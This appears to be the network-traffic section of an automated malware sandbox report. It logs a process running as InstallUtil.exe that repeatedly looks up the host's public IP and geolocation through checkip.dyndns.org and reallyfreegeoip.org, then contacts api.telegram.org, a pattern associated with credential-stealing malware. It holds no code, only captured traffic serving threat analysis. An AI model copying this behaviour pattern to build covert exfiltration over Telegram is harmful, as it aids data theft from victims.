                                                                                                                                                              Jan 8, 2025 16:33:18.892997026 CET49904443192.168.2.4188.114.97.3
                                                                                                                                                              Jan 8, 2025 16:33:18.893024921 CET44349904188.114.97.3192.168.2.4
Jan 8, 2025 16:33:18.893085003 CET | 49904 | 443 | 192.168.2.4 | 188.114.97.3
Jan 8, 2025 16:33:18.893393993 CET | 49904 | 443 | 192.168.2.4 | 188.114.97.3
Jan 8, 2025 16:33:18.893403053 CET | 443 | 49904 | 188.114.97.3 | 192.168.2.4
Jan 8, 2025 16:33:18.944190025 CET | 49897 | 80 | 192.168.2.4 | 132.226.8.169
Jan 8, 2025 16:33:19.360199928 CET | 443 | 49904 | 188.114.97.3 | 192.168.2.4
Jan 8, 2025 16:33:19.361964941 CET | 49904 | 443 | 192.168.2.4 | 188.114.97.3
Jan 8, 2025 16:33:19.361979008 CET | 443 | 49904 | 188.114.97.3 | 192.168.2.4
Jan 8, 2025 16:33:19.531297922 CET | 443 | 49904 | 188.114.97.3 | 192.168.2.4
Jan 8, 2025 16:33:19.531403065 CET | 443 | 49904 | 188.114.97.3 | 192.168.2.4
Jan 8, 2025 16:33:19.531614065 CET | 49904 | 443 | 192.168.2.4 | 188.114.97.3
Jan 8, 2025 16:33:19.531972885 CET | 49904 | 443 | 192.168.2.4 | 188.114.97.3
Jan 8, 2025 16:33:19.535188913 CET | 49897 | 80 | 192.168.2.4 | 132.226.8.169
Jan 8, 2025 16:33:19.535948038 CET | 49908 | 80 | 192.168.2.4 | 132.226.8.169
Jan 8, 2025 16:33:19.540108919 CET | 80 | 49897 | 132.226.8.169 | 192.168.2.4
Jan 8, 2025 16:33:19.540188074 CET | 49897 | 80 | 192.168.2.4 | 132.226.8.169
Jan 8, 2025 16:33:19.540756941 CET | 80 | 49908 | 132.226.8.169 | 192.168.2.4
Jan 8, 2025 16:33:19.541451931 CET | 49908 | 80 | 192.168.2.4 | 132.226.8.169
Jan 8, 2025 16:33:19.541558027 CET | 49908 | 80 | 192.168.2.4 | 132.226.8.169
Jan 8, 2025 16:33:19.546262980 CET | 80 | 49908 | 132.226.8.169 | 192.168.2.4
Jan 8, 2025 16:33:20.356795073 CET | 80 | 49908 | 132.226.8.169 | 192.168.2.4
Jan 8, 2025 16:33:20.358244896 CET | 49915 | 443 | 192.168.2.4 | 188.114.97.3
Jan 8, 2025 16:33:20.358306885 CET | 443 | 49915 | 188.114.97.3 | 192.168.2.4
Jan 8, 2025 16:33:20.358448029 CET | 49915 | 443 | 192.168.2.4 | 188.114.97.3
Jan 8, 2025 16:33:20.358763933 CET | 49915 | 443 | 192.168.2.4 | 188.114.97.3
Jan 8, 2025 16:33:20.358768940 CET | 443 | 49915 | 188.114.97.3 | 192.168.2.4
Jan 8, 2025 16:33:20.412499905 CET | 49908 | 80 | 192.168.2.4 | 132.226.8.169
Jan 8, 2025 16:33:20.850533962 CET | 443 | 49915 | 188.114.97.3 | 192.168.2.4
Jan 8, 2025 16:33:20.852149963 CET | 49915 | 443 | 192.168.2.4 | 188.114.97.3
Jan 8, 2025 16:33:20.852174997 CET | 443 | 49915 | 188.114.97.3 | 192.168.2.4
Jan 8, 2025 16:33:20.998884916 CET | 443 | 49915 | 188.114.97.3 | 192.168.2.4
Jan 8, 2025 16:33:20.998945951 CET | 443 | 49915 | 188.114.97.3 | 192.168.2.4
Jan 8, 2025 16:33:20.998990059 CET | 49915 | 443 | 192.168.2.4 | 188.114.97.3
Jan 8, 2025 16:33:20.999420881 CET | 49915 | 443 | 192.168.2.4 | 188.114.97.3
Jan 8, 2025 16:33:21.012372017 CET | 49908 | 80 | 192.168.2.4 | 132.226.8.169
Jan 8, 2025 16:33:21.017306089 CET | 80 | 49908 | 132.226.8.169 | 192.168.2.4
Jan 8, 2025 16:33:21.017359018 CET | 49908 | 80 | 192.168.2.4 | 132.226.8.169
Jan 8, 2025 16:33:21.020495892 CET | 49920 | 443 | 192.168.2.4 | 149.154.167.220
Jan 8, 2025 16:33:21.020519972 CET | 443 | 49920 | 149.154.167.220 | 192.168.2.4
Jan 8, 2025 16:33:21.020579100 CET | 49920 | 443 | 192.168.2.4 | 149.154.167.220
Jan 8, 2025 16:33:21.020951033 CET | 49920 | 443 | 192.168.2.4 | 149.154.167.220
Jan 8, 2025 16:33:21.020963907 CET | 443 | 49920 | 149.154.167.220 | 192.168.2.4
Jan 8, 2025 16:33:21.672909021 CET | 443 | 49920 | 149.154.167.220 | 192.168.2.4
Jan 8, 2025 16:33:21.673007011 CET | 49920 | 443 | 192.168.2.4 | 149.154.167.220
Jan 8, 2025 16:33:21.677673101 CET | 49920 | 443 | 192.168.2.4 | 149.154.167.220
Jan 8, 2025 16:33:21.677689075 CET | 443 | 49920 | 149.154.167.220 | 192.168.2.4
Jan 8, 2025 16:33:21.677964926 CET | 443 | 49920 | 149.154.167.220 | 192.168.2.4
Jan 8, 2025 16:33:21.683248043 CET | 49920 | 443 | 192.168.2.4 | 149.154.167.220
Jan 8, 2025 16:33:21.727322102 CET | 443 | 49920 | 149.154.167.220 | 192.168.2.4
Jan 8, 2025 16:33:21.949568987 CET | 443 | 49920 | 149.154.167.220 | 192.168.2.4
Jan 8, 2025 16:33:21.949626923 CET | 443 | 49920 | 149.154.167.220 | 192.168.2.4
Jan 8, 2025 16:33:21.950229883 CET | 49920 | 443 | 192.168.2.4 | 149.154.167.220
Jan 8, 2025 16:33:21.955327034 CET | 49920 | 443 | 192.168.2.4 | 149.154.167.220
Jan 8, 2025 16:33:38.015902042 CET | 49841 | 80 | 192.168.2.4 | 132.226.8.169
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 8, 2025 16:33:07.809209108 CET | 62403 | 53 | 192.168.2.4 | 1.1.1.1
Jan 8, 2025 16:33:07.816123009 CET | 53 | 62403 | 1.1.1.1 | 192.168.2.4
Jan 8, 2025 16:33:08.942646027 CET | 61735 | 53 | 192.168.2.4 | 1.1.1.1
Jan 8, 2025 16:33:08.951699018 CET | 53 | 61735 | 1.1.1.1 | 192.168.2.4
Jan 8, 2025 16:33:21.013015985 CET | 64655 | 53 | 192.168.2.4 | 1.1.1.1
Jan 8, 2025 16:33:21.019942999 CET | 53 | 64655 | 1.1.1.1 | 192.168.2.4

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Jan 8, 2025 16:33:07.809209108 CET | 192.168.2.4 | 1.1.1.1 | 0x87ed | Standard query (0) | checkip.dyndns.org | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:33:08.942646027 CET | 192.168.2.4 | 1.1.1.1 | 0x61d8 | Standard query (0) | reallyfreegeoip.org | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:33:21.013015985 CET | 192.168.2.4 | 1.1.1.1 | 0x7b62 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 8, 2025 16:33:07.816123009 CET | 1.1.1.1 | 192.168.2.4 | 0x87ed | No error (0) | checkip.dyndns.org | checkip.dyndns.com | | CNAME (Canonical name) | IN (0x0001) | false
Jan 8, 2025 16:33:07.816123009 CET | 1.1.1.1 | 192.168.2.4 | 0x87ed | No error (0) | checkip.dyndns.com | | 132.226.8.169 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:33:07.816123009 CET | 1.1.1.1 | 192.168.2.4 | 0x87ed | No error (0) | checkip.dyndns.com | | 193.122.6.168 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:33:07.816123009 CET | 1.1.1.1 | 192.168.2.4 | 0x87ed | No error (0) | checkip.dyndns.com | | 193.122.130.0 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:33:07.816123009 CET | 1.1.1.1 | 192.168.2.4 | 0x87ed | No error (0) | checkip.dyndns.com | | 132.226.247.73 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:33:07.816123009 CET | 1.1.1.1 | 192.168.2.4 | 0x87ed | No error (0) | checkip.dyndns.com | | 158.101.44.242 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:33:08.951699018 CET | 1.1.1.1 | 192.168.2.4 | 0x61d8 | No error (0) | reallyfreegeoip.org | | 188.114.97.3 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:33:08.951699018 CET | 1.1.1.1 | 192.168.2.4 | 0x61d8 | No error (0) | reallyfreegeoip.org | | 188.114.96.3 | A (IP address) | IN (0x0001) | false
Jan 8, 2025 16:33:21.019942999 CET | 1.1.1.1 | 192.168.2.4 | 0x7b62 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                                                                                                                                              • reallyfreegeoip.org
                                                                                                                                                              • api.telegram.org
                                                                                                                                                              • checkip.dyndns.org
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49821 | 132.226.8.169 | 80 | 7492 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 16:33:07.827218056 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 8, 2025 16:33:08.627363920 CET | 273 | IN | HTTP/1.1 200 OK
Date: Wed, 08 Jan 2025 15:33:08 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 8, 2025 16:33:08.630911112 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 8, 2025 16:33:08.905949116 CET | 273 | IN | HTTP/1.1 200 OK
Date: Wed, 08 Jan 2025 15:33:08 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>
Jan 8, 2025 16:33:09.791059971 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 8, 2025 16:33:10.063947916 CET | 273 | IN | HTTP/1.1 200 OK
Date: Wed, 08 Jan 2025 15:33:09 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.4 | 49841 | 132.226.8.169 | 80 | 7492 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 16:33:10.693666935 CET | 127 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Jan 8, 2025 16:33:11.486530066 CET | 273 | IN | HTTP/1.1 200 OK
Date: Wed, 08 Jan 2025 15:33:11 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.4 | 49853 | 132.226.8.169 | 80 | 7492 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 16:33:12.242264032 CET | 151 | OUT | GET / HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
Host: checkip.dyndns.org
Connection: Keep-Alive
Jan 8, 2025 16:33:13.042296886 CET | 273 | IN | HTTP/1.1 200 OK
Date: Wed, 08 Jan 2025 15:33:12 GMT
Content-Type: text/html
Content-Length: 104
Connection: keep-alive
Cache-Control: no-cache
Pragma: no-cache
Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 43 75 72 72 65 6e 74 20 49 50 20 43 68 65 63 6b 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 43 75 72 72 65 6e 74 20 49 50 20 41 64 64 72 65 73 73 3a 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.4  49863        132.226.8.169   80                7492  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp                           Bytes transferred  Direction  Data
Jan 8, 2025 16:33:13.661869049 CET  151                OUT        GET / HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                  Host: checkip.dyndns.org
                                                                  Connection: Keep-Alive
Jan 8, 2025 16:33:14.477482080 CET  273                IN         HTTP/1.1 200 OK
                                                                  Date: Wed, 08 Jan 2025 15:33:14 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 104
                                                                  Connection: keep-alive
                                                                  Cache-Control: no-cache
                                                                  Pragma: no-cache
                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
4           192.168.2.4  49874        132.226.8.169   80                7492  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp                           Bytes transferred  Direction  Data
Jan 8, 2025 16:33:15.167418003 CET  151                OUT        GET / HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                  Host: checkip.dyndns.org
                                                                  Connection: Keep-Alive
Jan 8, 2025 16:33:15.970668077 CET  273                IN         HTTP/1.1 200 OK
                                                                  Date: Wed, 08 Jan 2025 15:33:15 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 104
                                                                  Connection: keep-alive
                                                                  Cache-Control: no-cache
                                                                  Pragma: no-cache
                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
5           192.168.2.4  49886        132.226.8.169   80                7492  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp                           Bytes transferred  Direction  Data
Jan 8, 2025 16:33:16.611049891 CET  151                OUT        GET / HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                  Host: checkip.dyndns.org
                                                                  Connection: Keep-Alive
Jan 8, 2025 16:33:17.398276091 CET  273                IN         HTTP/1.1 200 OK
                                                                  Date: Wed, 08 Jan 2025 15:33:17 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 104
                                                                  Connection: keep-alive
                                                                  Cache-Control: no-cache
                                                                  Pragma: no-cache
                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
6           192.168.2.4  49897        132.226.8.169   80                7492  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp                           Bytes transferred  Direction  Data
Jan 8, 2025 16:33:18.107815027 CET  151                OUT        GET / HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                  Host: checkip.dyndns.org
                                                                  Connection: Keep-Alive
Jan 8, 2025 16:33:18.891547918 CET  273                IN         HTTP/1.1 200 OK
                                                                  Date: Wed, 08 Jan 2025 15:33:18 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 104
                                                                  Connection: keep-alive
                                                                  Cache-Control: no-cache
                                                                  Pragma: no-cache
                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
7           192.168.2.4  49908        132.226.8.169   80                7492  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp                           Bytes transferred  Direction  Data
Jan 8, 2025 16:33:19.541558027 CET  151                OUT        GET / HTTP/1.1
                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)
                                                                  Host: checkip.dyndns.org
                                                                  Connection: Keep-Alive
Jan 8, 2025 16:33:20.356795073 CET  273                IN         HTTP/1.1 200 OK
                                                                  Date: Wed, 08 Jan 2025 15:33:20 GMT
                                                                  Content-Type: text/html
                                                                  Content-Length: 104
                                                                  Connection: keep-alive
                                                                  Cache-Control: no-cache
                                                                  Pragma: no-cache
                                                                  Data Ascii: <html><head><title>Current IP Check</title></head><body>Current IP Address: 8.46.123.189</body></html>


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
0           192.168.2.4  49827        188.114.97.3    443               7492  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp                           Bytes transferred  Direction  Data
2025-01-08 15:33:09 UTC             85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                                  Host: reallyfreegeoip.org
                                                                  Connection: Keep-Alive
2025-01-08 15:33:09 UTC             855                IN         HTTP/1.1 200 OK
                                                                  Date: Wed, 08 Jan 2025 15:33:09 GMT
                                                                  Content-Type: text/xml
                                                                  Content-Length: 362
                                                                  Connection: close
                                                                  Age: 1665178
                                                                  Cache-Control: max-age=31536000
                                                                  cf-cache-status: HIT
                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7EIb4cbg2bM%2F31B118lHKg3GJL2B2xXQER0NBjxmbIEEUrIc18GS1j7vryseq5Xp%2Bn0dUIjJqCmJXSxLyPpQSUXtZ2EqWLhw9o2eJCeWXX5jH%2FaEymA0YpAn7hlKSGXuHWjNSpY3"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fed3e8f9b0a41d2-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1725&min_rtt=1723&rtt_var=650&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1679125&cwnd=251&unsent_bytes=0&cid=ce734b2f31bb2df8&ts=355&x=0"
2025-01-08 15:33:09 UTC             362                IN         Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.4  49836        188.114.97.3    443               7492  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp                           Bytes transferred  Direction  Data
2025-01-08 15:33:10 UTC             61                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                                  Host: reallyfreegeoip.org
2025-01-08 15:33:10 UTC             861                IN         HTTP/1.1 200 OK
                                                                  Date: Wed, 08 Jan 2025 15:33:10 GMT
                                                                  Content-Type: text/xml
                                                                  Content-Length: 362
                                                                  Connection: close
                                                                  Age: 1665179
                                                                  Cache-Control: max-age=31536000
                                                                  cf-cache-status: HIT
                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=oYbEkcCZNSEgKuS2gtys8owUPGMDVNvJl34dGiq%2F%2BA%2Bjs1nep1Ts6P0YgQ7JJPgcq0dkEgDE03B8l1qC9SKA2Sn9YVHpkQRlC%2FtKIqeZPZGxAYZ%2B1xAKfMBGLAXoB%2F6F6eLo4Zsr"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fed3e955c90425b-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1857&min_rtt=1847&rtt_var=713&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1513737&cwnd=239&unsent_bytes=0&cid=f3a62cbefec11763&ts=165&x=0"
2025-01-08 15:33:10 UTC             362                IN         Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.4  49847        188.114.97.3    443               7492  C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
Timestamp                           Bytes transferred  Direction  Data
2025-01-08 15:33:12 UTC             85                 OUT        GET /xml/8.46.123.189 HTTP/1.1
                                                                  Host: reallyfreegeoip.org
                                                                  Connection: Keep-Alive
2025-01-08 15:33:12 UTC             853                IN         HTTP/1.1 200 OK
                                                                  Date: Wed, 08 Jan 2025 15:33:12 GMT
                                                                  Content-Type: text/xml
                                                                  Content-Length: 362
                                                                  Connection: close
                                                                  Age: 1665181
                                                                  Cache-Control: max-age=31536000
                                                                  cf-cache-status: HIT
                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UO8EF2jTsVaXtFtd%2FtloeoUdTPmGGONLR5G0oSobHSdWCbUir94fpzd1oLLjszMPYCzaZSjqLS8g7otBhipKq25bEz7FK4no3M2CtPRAnTrqxC6VcWONqPaBQKUulbGgi%2BOWb1pY"}],"group":"cf-nel","max_age":604800}
                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                  Server: cloudflare
                                                                  CF-RAY: 8fed3e9f0a1b8c89-EWR
                                                                  alt-svc: h3=":443"; ma=86400
                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=4477&min_rtt=4477&rtt_var=2238&sent=5&recv=7&lost=0&retrans=1&sent_bytes=4238&recv_bytes=699&delivery_rate=229127&cwnd=202&unsent_bytes=0&cid=ff588b59f5c283a9&ts=286&x=0"
2025-01-08 15:33:12 UTC             362                IN         Data Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                                                                              Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.4 | 49859 | 188.114.97.3 | 443 | 7492 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-08 15:33:13 UTC | 85 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
    Connection: Keep-Alive
2025-01-08 15:33:13 UTC | 853 | IN | HTTP/1.1 200 OK
    Date: Wed, 08 Jan 2025 15:33:13 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1665182
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=efUngWJ2dmWPqXs1iFuypKv%2B8FclekobcXtdj78WNN7vM7QDNBveUkxVfg6vHSCE4FPAwcxye3zrZfYamiz6VfXwWlHr3ykS3bF7RNvzHrHHq0OkzcHHSE%2BXPjzctcIiI7ANC7k3"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fed3ea7ef818ccd-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=2022&min_rtt=2019&rtt_var=763&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1429270&cwnd=195&unsent_bytes=0&cid=5741addbea62c57b&ts=133&x=0"
2025-01-08 15:33:13 UTC | 362 | IN | Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
4 | 192.168.2.4 | 49869 | 188.114.97.3 | 443 | 7492 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Timestamp | Bytes transferred | Direction | Data
2025-01-08 15:33:15 UTC | 61 | OUT | GET /xml/8.46.123.189 HTTP/1.1
    Host: reallyfreegeoip.org
2025-01-08 15:33:15 UTC | 857 | IN | HTTP/1.1 200 OK
    Date: Wed, 08 Jan 2025 15:33:15 GMT
    Content-Type: text/xml
    Content-Length: 362
    Connection: close
    Age: 1665184
    Cache-Control: max-age=31536000
    cf-cache-status: HIT
    last-modified: Fri, 20 Dec 2024 09:00:10 GMT
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xseOc%2BExu9VWlIqNC4BkfhVRBxxKayZRsv6WpPR1LuyA6ntkw5kUoucgigX%2BWrSkU3YyUJ6P4MvRLCoAu4cPWVvnQ1N1nH6umwgRK6W%2F9Kc3agb41XteLtjQsC4NtbqbxhpDAnlr"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8fed3eb15ebe43fb-EWR
